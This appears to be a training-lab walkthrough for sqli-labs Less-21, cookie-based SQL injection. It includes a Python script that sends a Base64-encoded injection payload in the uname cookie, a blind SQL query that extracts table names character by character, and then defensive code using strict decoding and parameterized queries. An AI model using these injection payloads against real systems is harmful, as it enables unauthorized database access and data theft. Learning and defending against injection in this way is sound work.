Less-21
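This one is described as a cookie injection.
- `%3d` URL-decodes to `=`
- In Base64, the value 0 is `A` and the value 27 is `b`. Every 3 characters therefore produce 4 Base64 characters. If the string being encoded is split into groups of 3 and 1 or 2 characters are left over, the special character "=" is used to pad the Base64 output to 4 characters
- https://base64.us/ is an online Base64 site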
```python
# -*- coding: utf-8 -*-
import base64

import requests as req

url = 'https://sql.alienwares.top/Less-21/index.php'
# Test string; the uname cookie carries it Base64-encoded
payload = "admin') and 1=2#"
cookie = base64.b64encode(payload.encode('utf-8'))
header = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:60.0)Gecko/20100101 Firefox/60.0",
    "Cookie": 'uname=' + cookie.decode('utf-8'),
}
res = req.get(url, headers=header)
body = res.content.decode('utf-8')

# Alternative check on the response text:
# if 'Delete Your Cookie' in body:
#     print('success')
# else:
#     print('error')

# slap1.jpg in the response is treated as the failure marker
if '../images/slap1.jpg' in body:
    print('error')
else:
    print('success')
```
```sql
select mid((SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE()),1,1)='e'
```
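On the server side, the Base64 `uname` cookie has to be URL-decoded and Base64-decoded before it can be validated, because the encoded form hides the quote and parenthesis. The sketch below is an added example, not the lab's code: it decodes strictly, applies an allow-list and binds the value as a query parameter. The `users` table, the username policy and the in-memory SQLite database are assumptions made for the demonstration.

```python
import base64
import re
import sqlite3
from urllib.parse import quote, unquote

# Assumed username policy for this sketch (not taken from the lab).
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def encode_uname_cookie(name):
    """Build the cookie value as a client sends it: Base64, then URL-encode."""
    b64 = base64.b64encode(name.encode("utf-8")).decode("ascii")
    return quote(b64, safe="")  # '=' padding becomes %3D


def decode_uname_cookie(raw):
    """URL-decode and strictly Base64-decode the cookie; None if malformed."""
    try:
        return base64.b64decode(unquote(raw), validate=True).decode("utf-8")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None


def lookup_user(conn, raw_cookie, allow_list=True):
    """Return (id, username) for the cookie's user, or None."""
    uname = decode_uname_cookie(raw_cookie)
    if uname is None:
        return None
    # Validate the decoded value, not the Base64 text.
    if allow_list and not USERNAME_RE.fullmatch(uname):
        return None
    # Bound parameter: the decoded string is data, never SQL text.
    return conn.execute(
        "SELECT id, username FROM users WHERE username = ?", (uname,)
    ).fetchone()


def make_db():
    """Constructed in-memory table standing in for the application's users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
    conn.execute("INSERT INTO users (username) VALUES ('admin')")
    return conn


if __name__ == "__main__":
    db = make_db()
    page_string = "admin') and 1=2#"  # the test string from the script above
    for name in ("admin", page_string):
        cookie = encode_uname_cookie(name)
        print(cookie, lookup_user(db, cookie), lookup_user(db, cookie, allow_list=False))
```

With `allow_list=False` the page's test string still matches no row, because the bound parameter compares it as a literal username.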